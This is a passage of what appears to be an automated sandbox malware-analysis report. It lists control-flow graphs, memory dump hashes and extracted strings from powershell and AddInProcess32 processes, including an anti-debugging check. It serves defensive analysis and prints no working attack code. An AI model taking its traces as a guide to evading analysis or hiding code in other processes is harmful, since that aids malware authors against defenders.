                                            • Instruction Fuzzy Hash: BBE1E675B002159FDB24DB68C850ABABBE2FFD5314B2485BAD809CB352DB31DD42CB91

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1253 8b2c10-8b2c33 1254 8b2c39-8b2c3e 1253->1254 1255 8b2e0e-8b2e5f 1253->1255 1256 8b2c40-8b2c46 1254->1256 1257 8b2c56-8b2c5a 1254->1257 1263 8b2e61-8b2e67 1255->1263 1264 8b2e77-8b2eca 1255->1264 1259 8b2c4a-8b2c54 1256->1259 1260 8b2c48 1256->1260 1261 8b2dbb-8b2dc5 1257->1261 1262 8b2c60-8b2c64 1257->1262 1259->1257 1260->1257 1265 8b2dd3-8b2dd9 1261->1265 1266 8b2dc7-8b2dd0 1261->1266 1267 8b2c77 1262->1267 1268 8b2c66-8b2c75 1262->1268 1271 8b2e6b-8b2e75 1263->1271 1272 8b2e69 1263->1272 1288 8b2ecc-8b2eeb 1264->1288 1289 8b2ef3-8b2efa 1264->1289 1273 8b2ddb-8b2ddd 1265->1273 1274 8b2ddf-8b2deb 1265->1274 1270 8b2c79-8b2c7b 1267->1270 1268->1270 1270->1261 1275 8b2c81-8b2ca1 1270->1275 1271->1264 1272->1264 1277 8b2ded-8b2e0b 1273->1277 1274->1277 1286 8b2ca3-8b2cbe 1275->1286 1287 8b2cc0 1275->1287 1290 8b2cc2-8b2cc4 1286->1290 1287->1290 1288->1289 1291 8b2fa3-8b2fd0 1289->1291 1292 8b2f00-8b2f05 1289->1292 1290->1261 1295 8b2cca-8b2ccc 1290->1295 1327 8b2fd5-8b2fe9 1291->1327 1296 8b2f1d-8b2f29 1292->1296 1297 8b2f07-8b2f0d 1292->1297 1300 8b2cce-8b2cda 1295->1300 1301 8b2cdc 1295->1301 1296->1291 1298 8b2f2b-8b2f46 1296->1298 1302 8b2f0f 1297->1302 1303 8b2f11-8b2f1b 1297->1303 1310 8b2f48-8b2f4e 1298->1310 1311 8b2f60-8b2f64 1298->1311 1304 8b2cde-8b2ce0 1300->1304 1301->1304 1302->1296 1303->1296 1304->1261 1308 8b2ce6-8b2d06 1304->1308 1320 8b2d08-8b2d0e 1308->1320 1321 8b2d1e-8b2d22 1308->1321 1313 8b2f52-8b2f5e 1310->1313 1314 8b2f50 1310->1314 1316 8b2f6b-8b2fa1 1311->1316 1313->1311 1314->1311 1316->1327 1323 8b2d12-8b2d14 1320->1323 1324 8b2d10 1320->1324 1325 8b2d3c-8b2d40 1321->1325 1326 8b2d24-8b2d2a 1321->1326 1323->1321 1324->1321 1334 8b2d47-8b2d49 1325->1334 1328 8b2d2e-8b2d3a 1326->1328 1329 8b2d2c 1326->1329 1330 8b2feb-8b300a 1327->1330 1331 8b3012-8b304a 1327->1331 1328->1325 1329->1325 1330->1331 1336 8b2d4b-8b2d51 1334->1336 1337 8b2d61-8b2db8 1334->1337 1340 8b2d53 1336->1340 1341 8b2d55-8b2d57 1336->1341 1340->1337 1341->1337
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.520032653.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_8b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 371c8f718ea8f60dc1fe7950fa1ebf5e2c4c0af85aa580c3640f40ee2e10bc65
                                            • Instruction ID: e9ff3693bbded6f10365ac6853a43badfb29cce87bd7a5ff6fb41a4a86f6c410
                                            • Opcode Fuzzy Hash: 371c8f718ea8f60dc1fe7950fa1ebf5e2c4c0af85aa580c3640f40ee2e10bc65
                                            • Instruction Fuzzy Hash: 78B17274B002098FDB249B64C454BEA7BF2FF89314F24856AD805EB352DB71DD82CBA1
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.520032653.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_8b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cbd9dfa849cafb0484546c539900a4c61779137597d56a9a265b62590c173942
                                            • Instruction ID: 5b0e79b6547fce9a853ac21c3d87e3e75daa3f043c8e5a7ae08d1930d1b4cb5f
                                            • Opcode Fuzzy Hash: cbd9dfa849cafb0484546c539900a4c61779137597d56a9a265b62590c173942
                                            • Instruction Fuzzy Hash: B541B530A092949FDB21CB24C869AA9BFB1FF86300F1980EBD944DF392C7719D46C751
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.520032653.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_8b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e6c1a65d27ad256fc08f85fea059dabdbd93a4af88c30438617d8d68acfe80f3
                                            • Instruction ID: c27620df2e1d9fc70b6743cf9c6017414d0c30172a5623e6048b0ae25b7f5d19
                                            • Opcode Fuzzy Hash: e6c1a65d27ad256fc08f85fea059dabdbd93a4af88c30438617d8d68acfe80f3
                                            • Instruction Fuzzy Hash: E331AE30A0420D8FDF259B2489256FA7BA0FF90315F2941AAD804DB392DB75CD85CB61
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.520032653.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_8b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: baddde9c284241ddafafeaa8bb4b108ef4220208e5bff820f77496c3b9888ed6
                                            • Instruction ID: c52c404e42939d750c187b37e5cdc474f6dbaae0cd66e51ff6cf69aec9d535e0
                                            • Opcode Fuzzy Hash: baddde9c284241ddafafeaa8bb4b108ef4220208e5bff820f77496c3b9888ed6
                                            • Instruction Fuzzy Hash: C731A131B002198FDB349A6994046FBBBA2FBD1311F2484BAD559DB390DF31C996CF92
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.520032653.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_8b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 88e4f77293d26a7246eb1919a4be1b709fa07d282eb09f88632a5d9ffdde0122
                                            • Instruction ID: 6e9dfc19e3e323ec3f5e4c2cebb597f92e624139a92be8144c2d1360ec138727
                                            • Opcode Fuzzy Hash: 88e4f77293d26a7246eb1919a4be1b709fa07d282eb09f88632a5d9ffdde0122
                                            • Instruction Fuzzy Hash: B02130753001059FE714CE49C881E76F7AAFBA5314B18C1AAE819CB355CB32DD52CB91
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.520032653.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_8b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: adfa535eefd3125bade9833b5b68e66b398114cc13ac3535f6758e7addd24e7f
                                            • Instruction ID: 0db5ad08a673cc33a88ffd959f0090f62248c309edf23677f05e959493459574
                                            • Opcode Fuzzy Hash: adfa535eefd3125bade9833b5b68e66b398114cc13ac3535f6758e7addd24e7f
                                            • Instruction Fuzzy Hash: E1316D30A00609DFDF28CE19C845BEA7BA1FB44724F24916AE415DB3A5D771DA84CB51
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.520032653.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_8b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3e178c0925e5419a7a966eb2a45097d47886369c58deebe7c205f75e787408c8
                                            • Instruction ID: c235bd35f7c861fb9cb8d50c5cc300a7b288593559ecf448a2e7f94fcfea4772
                                            • Opcode Fuzzy Hash: 3e178c0925e5419a7a966eb2a45097d47886369c58deebe7c205f75e787408c8
                                            • Instruction Fuzzy Hash: 5E21B0B0A00205EFCB64DE25C458AA9B7E1FF95310F158276D414CB320EF74DE81CB95
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.520032653.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_8b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 28e764ae3f228667dd138be6d521379bf7344c86376c6b2e6c714b62e72c6af2
                                            • Instruction ID: 62431c2f1585d8613b2dbb33607f0572991e2280bf0145d61542f60159aba60e
                                            • Opcode Fuzzy Hash: 28e764ae3f228667dd138be6d521379bf7344c86376c6b2e6c714b62e72c6af2
                                            • Instruction Fuzzy Hash: 8E115C31A042098FDB358F64C4006BBBBB1FF91711F2945AAD854DB3A1DB31C986CF52
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.520032653.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_8b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e59f26c661ff7b5592f68437f8e7b4d0f5101ea4703a7bf7131903367ccde23e
                                            • Instruction ID: 3eebd18e6c59a5a7e6afbd90fbf97dc8d518f6b89fa250034dcba67186a1cef8
                                            • Opcode Fuzzy Hash: e59f26c661ff7b5592f68437f8e7b4d0f5101ea4703a7bf7131903367ccde23e
                                            • Instruction Fuzzy Hash: 8211D02115E3C58FD7039BB888298A13FB1AE5721835E41DBD0C1CF1B3D628994EDB67
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.519904759.000000000021D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0021D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_21d000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3c4d972091b58f4f0d4442604c4568cfdb26d1401ca287fd16d62f6f21d2bcea
                                            • Instruction ID: 4cc921b288b254d00a678cabf0ac5776790ffb0f73af80d3198b7051cf94a029
                                            • Opcode Fuzzy Hash: 3c4d972091b58f4f0d4442604c4568cfdb26d1401ca287fd16d62f6f21d2bcea
                                            • Instruction Fuzzy Hash: 6201F731514340EEE7244E15CCC47A7BBD8DFA5724F18C559EC490B282C3B99995CAB1
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.519904759.000000000021D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0021D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_21d000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c6c31eaab6bb81a9bd2f272a60c83e2659c8b51e4a35b2cc921bc60dc3399c4a
                                            • Instruction ID: 1c99d38c64df96840c789420830fc98745d924e2b86766fe793362d640368ab5
                                            • Opcode Fuzzy Hash: c6c31eaab6bb81a9bd2f272a60c83e2659c8b51e4a35b2cc921bc60dc3399c4a
                                            • Instruction Fuzzy Hash: F5F06271504244EEE7208E15CCC4BA6FBD8EB55724F18C55AED485F282C3799D85CAB1
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.520032653.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_8b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a321721bc5518f40c6c16873910ed96f5c7e3b1c11dbf7646c96879be52c4be7
                                            • Instruction ID: 3cf47207e036d8701c4922f0cec0b70290ed3760fb4449b56c6fb82570ded98e
                                            • Opcode Fuzzy Hash: a321721bc5518f40c6c16873910ed96f5c7e3b1c11dbf7646c96879be52c4be7
                                            • Instruction Fuzzy Hash: F6C04C366004089A8600DA98E8414D9F720EA9512971482A7D51DC7211963395178680
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.519940452.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_310000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ebef3d772a2fc643a2455b0b52138fb641bacee5135313bf6b41a8926a84f8cf
                                            • Instruction ID: 1c8b19fa865eb706db4f75d9d87b8a664fa3f9786f28c7f6ae77cc366749d662
                                            • Opcode Fuzzy Hash: ebef3d772a2fc643a2455b0b52138fb641bacee5135313bf6b41a8926a84f8cf
                                            • Instruction Fuzzy Hash: 9A719DD281E7C26FD70B577448653DA3F70AF6B250B1A06E7C281CB1A3E518895AC36A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.520032653.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_8b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @=]$L4#p$L4#p$L4#p
                                            • API String ID: 0-2866600264
                                            • Opcode ID: 047f54655804f50f618d0d8dd4a9b9f57f77226ecc4e0eb7526edbcb968f95d9
                                            • Instruction ID: 34b62bebfa64abbbe7fd7083f8945406810d162403a502259cb0bb0d59813cee
                                            • Opcode Fuzzy Hash: 047f54655804f50f618d0d8dd4a9b9f57f77226ecc4e0eb7526edbcb968f95d9
                                            • Instruction Fuzzy Hash: 1D6116307002589FDF15AA68C814BBEBBA2FF85310F14807AEA05DB391DB31DD81CB62

                                            Execution Graph

                                            Execution Coverage:9.2%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:100%
                                            Total number of Nodes:3
                                            Total number of Limit Nodes:0
                                            execution_graph 10610 1d5310 10611 1d5354 CheckRemoteDebuggerPresent 10610->10611 10612 1d5396 10611->10612

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 839 1d5310-1d5394 CheckRemoteDebuggerPresent 841 1d539d-1d53d8 839->841 842 1d5396-1d539c 839->842 842->841
                                            APIs
                                            • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 001D5387
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.626088560.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1d0000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: CheckDebuggerPresentRemote
                                            • String ID:
                                            • API String ID: 3662101638-0
                                            • Opcode ID: f590cd5e3296d8839971e2665fcfabb411099ec4d86b777e04502c461937d942
                                            • Instruction ID: 41f0013d688565ccd94b0c0c9642bea46c3d52f8ea17ec03367386d5e3c57cc0
                                            • Opcode Fuzzy Hash: f590cd5e3296d8839971e2665fcfabb411099ec4d86b777e04502c461937d942
                                            • Instruction Fuzzy Hash: 502139B19002198FDB10CF9AD884BEEFBF5AF49310F14841AD459B7350D778AA44CF61

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 5e45e3-5e45ec 1 5e45ee-5e460f 0->1 2 5e45df-5e45e1 0->2 4 5e4611-5e4614 1->4 2->0 5 5e4616 call 5e48b1 4->5 6 5e4623-5e4626 4->6 9 5e461c-5e461e 5->9 7 5e4628-5e463e 6->7 8 5e4643-5e4646 6->8 7->8 10 5e4648-5e4674 8->10 11 5e4679-5e467b 8->11 9->6 10->11 13 5e467d 11->13 14 5e4682-5e4685 11->14 13->14 14->4 15 5e4687-5e4696 14->15 18 5e469c-5e46a6 15->18 19 5e472a-5e473f 15->19 20 5e46a8-5e470e 18->20 21 5e4715-5e4724 18->21 25 5e4740 19->25 20->21 21->18 21->19 25->25
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.626840418.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_5e0000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: h3:$h3:
                                            • API String ID: 0-398005931
                                            • Opcode ID: e2c49920073d0b7fd0e09956590f6bbef3276cb71cf3c7843539ae9fa099e11e
                                            • Instruction ID: a85e8576b9b2eb4f486f006ffa136352f20d599020d06ab025a4692a2601bc51
                                            • Opcode Fuzzy Hash: e2c49920073d0b7fd0e09956590f6bbef3276cb71cf3c7843539ae9fa099e11e
                                            • Instruction Fuzzy Hash: C741CD30A103859FDB15DFA9C48169EBFB5FF8A300F00896AE585DB255DB74A946CF80

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 35 5e45f8-5e460f 36 5e4611-5e4614 35->36 37 5e4616 call 5e48b1 36->37 38 5e4623-5e4626 36->38 41 5e461c-5e461e 37->41 39 5e4628-5e463e 38->39 40 5e4643-5e4646 38->40 39->40 42 5e4648-5e4674 40->42 43 5e4679-5e467b 40->43 41->38 42->43 45 5e467d 43->45 46 5e4682-5e4685 43->46 45->46 46->36 47 5e4687-5e4696 46->47 50 5e469c-5e46a6 47->50 51 5e472a-5e473f 47->51 52 5e46a8-5e470e 50->52 53 5e4715-5e4724 50->53 57 5e4740 51->57 52->53 53->50 53->51 57->57
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.626840418.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_5e0000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: h3:$h3:
                                            • API String ID: 0-398005931
                                            • Opcode ID: ebe499a72e4179bab23ef7ae98252e4f608a7f675b848bd20443d7b8e83e7411
                                            • Instruction ID: bc95bbdf3009e39968854740a1bd954084eb74d3e62de0614ca57fb062630b46
                                            • Opcode Fuzzy Hash: ebe499a72e4179bab23ef7ae98252e4f608a7f675b848bd20443d7b8e83e7411
                                            • Instruction Fuzzy Hash: 7A315034A107499FDB14DFA9C48569EBBB6FF8A300F108929E545EB354EB70AD45CF80

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 716 5e0ac0-5e0adc 717 5e0ade-5e0ae1 716->717 718 5e0b04-5e0b06 717->718 719 5e0ae3-5e0aff 717->719 720 5e0b0d-5e0b10 718->720 721 5e0b08 718->721 719->718 720->717 723 5e0b12-5e0c2d 720->723 721->720 742 5e0c2f-5e0c33 723->742 743 5e0c39-5e0c48 723->743 742->743 744 5e0c4e-5e0c57 743->744 745 5e10a6-5e10b0 743->745 746 5e109c-5e10a1 744->746 747 5e0c5d-5e0c68 744->747 746->745 748 5e0c6e-5e0c85 747->748 749 5e1076-5e1082 747->749 748->749 753 5e0c8b-5e0c94 748->753 749->744 751 5e1088 749->751 751->745 753->746 754 5e0c9a-5e0cbf 753->754 757 5e1064-5e1070 754->757 758 5e0cc5-5e0cdc 754->758 757->749 757->753 758->757 760 5e0ce2-5e0ceb 758->760 760->746 761 5e0cf1-5e0d0b 760->761 763 5e0d12-5e0d14 761->763 764 5e0d5e-5e0d71 763->764 765 5e0d16-5e0d26 763->765 766 5e1040-5e1044 764->766 770 5e0d28-5e0d38 765->770 771 5e0d76-5e0da9 765->771 768 5e104f-5e105e 766->768 769 5e1046 766->769 768->757 768->760 769->768 770->771 775 5e0d3a-5e0d4a 770->775 780 5e0deb-5e0dfb 771->780 781 5e0dab-5e0de9 771->781 775->771 779 5e0d4c-5e0d5c 775->779 779->764 779->771 785 5e0dfd-5e0e03 780->785 786 5e0e13-5e0e28 780->786 792 5e0e2a-5e0e91 781->792 787 5e0e07-5e0e09 785->787 788 5e0e05 785->788 786->792 787->786 788->786 800 5e0e97-5e0e9a 792->800 801 5e0f43-5e0f63 792->801 802 5e0ea0-5e0eb0 800->802 803 5e1021-5e1026 800->803 810 5e0fbb-5e0fc7 801->810 811 5e0f65-5e0fa6 801->811 808 5e0f39-5e0f3d 802->808 809 5e0eb6-5e0f0b 802->809 812 5e102b-5e103e 803->812 808->800 808->801 809->803 835 5e0f11-5e0f2b 809->835 817 5e0fdf-5e0ff4 810->817 818 5e0fc9-5e0fcf 810->818 811->803 832 5e0fa8-5e0fb9 811->832 812->766 825 5e0ff6-5e101f 817->825 819 5e0fd3-5e0fd5 818->819 820 5e0fd1 818->820 819->817 820->817 825->812 832->825 835->803 838 5e0f31-5e0f37 835->838 838->801
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.626840418.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_5e0000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: &55p
                                            • API String ID: 0-1955183375
                                            • Opcode ID: 065d52a690b7714b33d2646d1ef5bc10d0459bfdadf0831c9fc46bcda0be3275
                                            • Instruction ID: 2d9122008c9f53879aa626d1d96213e6fbd25dadc0610de152856254ca04c47f
                                            • Opcode Fuzzy Hash: 065d52a690b7714b33d2646d1ef5bc10d0459bfdadf0831c9fc46bcda0be3275
                                            • Instruction Fuzzy Hash: 6BF17E30A00245CFDB18EF65D494B6EBBB7BF88300F24856AD515AB399DB75EC82CB50

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 845 5e0738-5e0754 846 5e0756-5e0759 845->846 847 5e077c-5e077f 846->847 848 5e075b-5e0777 846->848 849 5e07a8-5e07aa 847->849 850 5e0781-5e079b call 1dd95d 847->850 848->847 852 5e07ac 849->852 853 5e07b1-5e07b4 849->853 865 5e07a0-5e07a3 850->865 852->853 853->846 855 5e07b6-5e07c2 853->855 857 5e0a78-5e0a7b 855->857 858 5e07c8-5e07d1 855->858 861 5e0aa2-5e0aab 857->861 859 5e0a7d-5e0a9b 858->859 860 5e07d7-5e07f8 858->860 859->861 868 5e07fa-5e07fd 860->868 869 5e0802-5e083c 860->869 865->849 868->861 876 5e083e-5e0841 869->876 877 5e0846-5e084c 869->877 876->861 878 5e0a66-5e0a72 877->878 879 5e0852-5e08bb 877->879 878->857 878->858 879->859 888 5e08c1-5e08cb 879->888 888->859 889 5e08d1-5e08e7 888->889 889->859 891 5e08ed-5e0908 889->891 894 5e090a-5e090f 891->894 895 5e0917-5e091e 891->895 894->895 895->859 896 5e0924-5e092e 895->896 897 5e093d-5e0944 896->897 898 5e0930-5e0935 896->898 897->859 899 5e094a-5e0954 897->899 898->897 900 5e0956-5e095b 899->900 901 5e0963-5e096a 899->901 900->901 901->859 902 5e0970-5e0980 901->902 903 5e098f-5e0996 902->903 904 5e0982-5e0987 902->904 903->859 905 5e099c-5e09a6 903->905 904->903 906 5e09a8-5e09ad 905->906 907 5e09b5-5e09bc 905->907 906->907 907->859 908 5e09c2-5e09da 907->908 910 5e09dc-5e09e9 908->910 911 5e09eb 908->911 912 5e09f0-5e09f2 910->912 911->912 913 5e0a59-5e0a60 912->913 914 5e09f4-5e09f6 912->914 913->878 913->879 915 5e09f8-5e0a02 914->915 916 5e0a04 914->916 917 5e0a09-5e0a0b 915->917 916->917 917->913 918 5e0a0d-5e0a52 917->918 918->913
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.626840418.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_5e0000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4!:
                                            • API String ID: 0-2528139279
                                            • Opcode ID: 4b241497902e8bbc52782e673e7c750bf3b595576ff0e88d66b2a869adcc1577
                                            • Instruction ID: 1c95492169f6298e586719c1201dce0fb02c410742a7cabdce1aceba1c8d827a
                                            • Opcode Fuzzy Hash: 4b241497902e8bbc52782e673e7c750bf3b595576ff0e88d66b2a869adcc1577
                                            • Instruction Fuzzy Hash: 57A17A30A002549FDB18EB65D584B6EBBF2FF84310F148869E499AB391DB75ED81CF80

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 926 5e1ab0-5e1acf 927 5e1ad1-5e1ad4 926->927 928 5e1ad6-5e1af2 927->928 929 5e1af7-5e1afa 927->929 928->929 930 5e1ba7-5e1baa 929->930 931 5e1b00-5e1b0c 929->931 933 5e1de0-5e1de2 930->933 934 5e1bb0-5e1bbf 930->934 935 5e1b17-5e1b19 931->935 936 5e1de9-5e1dec 933->936 937 5e1de4 933->937 947 5e1bde-5e1c22 934->947 948 5e1bc1-5e1bdc 934->948 939 5e1b1b-5e1b21 935->939 940 5e1b31-5e1b35 935->940 936->927 942 5e1df2-5e1dfb 936->942 937->936 943 5e1b25-5e1b27 939->943 944 5e1b23 939->944 945 5e1b37-5e1b41 940->945 946 5e1b43 940->946 943->940 944->940 949 5e1b48-5e1b4a 945->949 946->949 954 5e1c28-5e1c39 947->954 955 5e1db4-5e1dc9 947->955 948->947 952 5e1b4c-5e1b4f 949->952 953 5e1b61-5e1b9a 949->953 952->942 953->934 968 5e1b9c-5e1ba6 953->968 961 5e1d9f-5e1dae 954->961 962 5e1c3f-5e1c5c 954->962 955->933 961->954 961->955 962->961 969 5e1c62-5e1d59 962->969 992 5e1d5b-5e1d65 969->992 993 5e1d67 969->993 994 5e1d6c-5e1d6e 992->994 993->994 994->961 995 5e1d70-5e1d75 994->995 996 5e1d77-5e1d81 995->996 997 5e1d83 995->997 998 5e1d88-5e1d8a 996->998 997->998 998->961 999 5e1d8c-5e1d98 998->999 999->961
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.626840418.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_5e0000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: P':
                                            • API String ID: 0-2402589813
                                            • Opcode ID: 4b757374af226428e00a99f11eb8227f68a6200c14e24cf6a65bb99e78921f15
                                            • Instruction ID: 9c81e0e1b4870433a48d352f7bf2ffc16fd807265dcbc9494822765af865a1c2
                                            • Opcode Fuzzy Hash: 4b757374af226428e00a99f11eb8227f68a6200c14e24cf6a65bb99e78921f15
                                            • Instruction Fuzzy Hash: 3D91B030B006148FDB18DF65D8856AE7BE6FFC5300F208829E906DB390EB75ED428B94

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1001 5e0ab0-5e0adc 1003 5e0ade-5e0ae1 1001->1003 1004 5e0b04-5e0b06 1003->1004 1005 5e0ae3-5e0aff 1003->1005 1006 5e0b0d-5e0b10 1004->1006 1007 5e0b08 1004->1007 1005->1004 1006->1003 1009 5e0b12-5e0c2d 1006->1009 1007->1006 1028 5e0c2f-5e0c33 1009->1028 1029 5e0c39-5e0c48 1009->1029 1028->1029 1030 5e0c4e-5e0c57 1029->1030 1031 5e10a6-5e10b0 1029->1031 1032 5e109c-5e10a1 1030->1032 1033 5e0c5d-5e0c68 1030->1033 1032->1031 1034 5e0c6e-5e0c85 1033->1034 1035 5e1076-5e1082 1033->1035 1034->1035 1039 5e0c8b-5e0c94 1034->1039 1035->1030 1037 5e1088 1035->1037 1037->1031 1039->1032 1040 5e0c9a-5e0cbf 1039->1040 1043 5e1064-5e1070 1040->1043 1044 5e0cc5-5e0cdc 1040->1044 1043->1035 1043->1039 1044->1043 1046 5e0ce2-5e0ceb 1044->1046 1046->1032 1047 5e0cf1-5e0d0b 1046->1047 1049 5e0d12-5e0d14 1047->1049 1050 5e0d5e-5e0d71 1049->1050 1051 5e0d16-5e0d26 1049->1051 1052 5e1040-5e1044 1050->1052 1056 5e0d28-5e0d38 1051->1056 1057 5e0d76-5e0da9 1051->1057 1054 5e104f-5e105e 1052->1054 1055 5e1046 1052->1055 1054->1043 1054->1046 1055->1054 1056->1057 1061 5e0d3a-5e0d4a 1056->1061 1066 5e0deb-5e0dfb 1057->1066 1067 5e0dab-5e0de9 1057->1067 1061->1057 1065 5e0d4c-5e0d5c 1061->1065 1065->1050 1065->1057 1071 5e0dfd-5e0e03 1066->1071 1072 5e0e13-5e0e28 1066->1072 1078 5e0e2a-5e0e91 1067->1078 1073 5e0e07-5e0e09 1071->1073 1074 5e0e05 1071->1074 1072->1078 1073->1072 1074->1072 1086 5e0e97-5e0e9a 1078->1086 1087 5e0f43-5e0f63 1078->1087 1088 5e0ea0-5e0eb0 1086->1088 1089 5e1021-5e1026 1086->1089 1096 5e0fbb-5e0fc7 1087->1096 1097 5e0f65-5e0fa6 1087->1097 1094 5e0f39-5e0f3d 1088->1094 1095 5e0eb6-5e0f0b 1088->1095 1098 5e102b-5e103e 1089->1098 1094->1086 1094->1087 1095->1089 1121 5e0f11-5e0f2b 1095->1121 1103 5e0fdf-5e0ff4 1096->1103 1104 5e0fc9-5e0fcf 1096->1104 1097->1089 1118 5e0fa8-5e0fb9 1097->1118 1098->1052 1111 5e0ff6-5e101f 